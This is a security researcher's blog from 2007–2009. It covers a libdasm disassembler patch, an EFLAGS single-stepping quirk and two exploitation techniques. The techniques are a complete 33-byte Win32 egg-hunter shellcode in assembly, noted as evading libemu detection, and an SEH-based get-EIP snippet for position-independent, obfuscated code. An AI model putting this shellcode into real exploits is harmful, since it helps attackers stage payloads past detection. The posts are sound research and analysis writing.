Malware Activity

2009-05-08

libdasm @ Google Code

Since `jt' apparently does not have the time or envy to maintain libdasm anymore, Ange Albertini has taken the task and created a new Google Code Project for libdasm (libdasm was public domain anyway) for maintining it; my recent FPU fix is already included and I will try to get people like Silvio Cesare adding their fixes and patches as well. Thanks Ange for stepping forward!

Labels:

2009-04-10

libdasm D9h FPU Instructions Fix

libdasm incorrectly disassembles FPU instructions with D9 prefix and second byte > fnop. Affected instructions amongst others include fsin, fcos and frndint. The reason is simple, there is four NULL lines missing in the correspondending opcode table, resulting in an off-by-four for the following opcodes. I've sent a very simple patch to the libdasm author, until it is included in a release, it's here as well:

$ cat libdasm-1.5-fpufix-d9prefix.patch 
--- libdasm-1.5/opcode_tables.h 2006-02-21 15:29:41.000000000 +0100
+++ libdasm-1.5-fpufix/opcode_tables.h 2009-04-10 13:32:20.000000000 +0200
@@ -1818,6 +1818,10 @@
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    "fchs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    "fabs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 

I've stumbled across this while trying to use my (pefile and pydasm based) code normalizer on a malware packer using float's for looping.

Labels: ,

2009-02-18

Win32 Egg Search Shellcode, 33 bytes

For a current collaboration on taking down yet another botnet, I had to write a very small shellcode. Thanks to some ideas from Understanding Windows Shellcode by skape, I managed to write a egg search shellcode in 33 bytes.

The general idea of the AddAtomA int 2e memory testing was public, but the best implementation I could find was 40 bytes long (skape's one) and had the limitation of an executable marker. This one is 33 bytes long and you can choose any four byte marker you want. If we wouldn't start at 0, we could save two more bytes going down to 31, but this makes search a lot slower. There is a 32 byte version by skape that requires page aligned 2nd stage, which is not really comparable because it again requires an executable marker and a 2nd stage injection of at least 4kb with a long marker sled. Sill I first got the int 2e idea from his paper, so credits to him for that.

The only real limitation of this shellcode is that your second stage may not be within the first four bytes of a page boundary. Theoretical probability is < 0.1%, having heap allocator designs in mind, it is even less probable.
If this is a severe stability limitation for you, there is two solutions:

  1. Use an executable marker and put it in front of the shellcode twice. Usually, it will trigger in the first four bytes and jump into the second marker. If it really is page aligned, it will jump right after the second marker.
  2. Use any (non-executable) marker and put a second marker with a relative jump to your shellcode after the shellcode.

This shellcode is 100% position independent w/o any GetPC sequence, so it won't be detected by libemu and similiar things (although this wasn't a design goal but just a side effect). The second stage shellcode can also be implemented without any GetPC sequence, as it gets its own address passed in edx.

There is a weird inc ebx instruction at the end of the shellcode, but for a good reason: If this eggsearch shellcode lies in memory before the actual shellcode, our search will stop at the imm32 of the cmp r/m32, imm32 instruction and the jmp edx will go to the next instruction, jne (= jnz) address_loop. The inc ebx ensures that ZF is not set (unless we're very unlucky and our exploitation environment had the otherwise unused ebx register set to 0xffffffff) and thus our search continues at the next address.

; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski 

[bits 32]

marker equ 0x1f217767   ; 'gw!\x1f'

start:
 xor edx, edx   ; edx = 0, pointer to examined address
      
address_loop:
 inc edx    ; edx++, try next address

pagestart_check:
 test dx, 0x0ffc   ; are we within the first 4 bytes of a page?
 jz address_loop   ; if so, try next address as previous page might be unreadable
     ; and the cmp [edx-4], marker might result in a segmentation fault

access_check:
 push edx   ; save across syscall
 push byte 8   ; eax = 8, syscall nr of AddAtomA
 pop eax    ; ^
 int 0x2e   ; fire syscall (eax = 8, edx = ptr)
 cmp al, 0x05   ; is result 0xc0000005? (a bit sloppy)
 pop edx    ;

 je address_loop   ; jmp if result was 0xc0000005

egg_check:
 cmp dword [edx-4], marker ; is our egg right before examined address?
 jne address_loop  ; if not, try next address

egg_execute:
 inc ebx    ; make sure, zf is not set
 jmp edx    ; we found our egg at [edx-4], so we can jmp to edx

Labels: ,

2007-09-27

REP(N)Z and the EFLAGS

Working on some debugger like automation code for EmsiSoft, I recently discovered a funny property when single stepping REPNZ prefixed SCAS and CMPS instructions using the TF bit set in EFLAGS. As expected, for each single byte / word / doubleword, a debug event occurs. However, the EFLAGS register's status bits (e.g. ZF) are not correct for each single iteration but the last.

I tested this in Windows XP in a VmWare, didn't have the time to reproduce on a physical machine yet. Let me know if you run over this quirk, too.

Labels:

2007-02-23

Get EIP with SEH

While talking about shellcode detection with Paul and Markus, I remembered some SEH based code I've written some time ago for some code to be position independent (and obfuscated). Unfortunately, I couldn't find the original source anymore but wrote up, what I remembered (and didn't test it):

Snippet 1: Custom Handler

mov eax, [esp+0x10]
mov eax, [eax+0x0c]
push eax
jmp eax

Snippet 2: SEH Overwrite

mov edi, [fs:0]
mov edi, [edi+4]
mov [edi+0], 0x448b6766
mov [edi+4], 0x67661024
mov [edi+8], 0x660c408b
mov [edi+12], 0xe0ff6650
 
xor eax, eax
xor [eax], eax
 
pop eax

Basically, the second snippet fetches the address of the current top-most SEH, overwrites it with the binary version of the first snippet and triggers a general protection fault. The address is then popped. Of course, this only works on Win32.

At the time I `invented' that code, I didn't have any reference for such code ITW. But I'm pretty sure, I'm not the first one to have that idea (although a quick Google run didn't reveal anything to me).

Labels: ,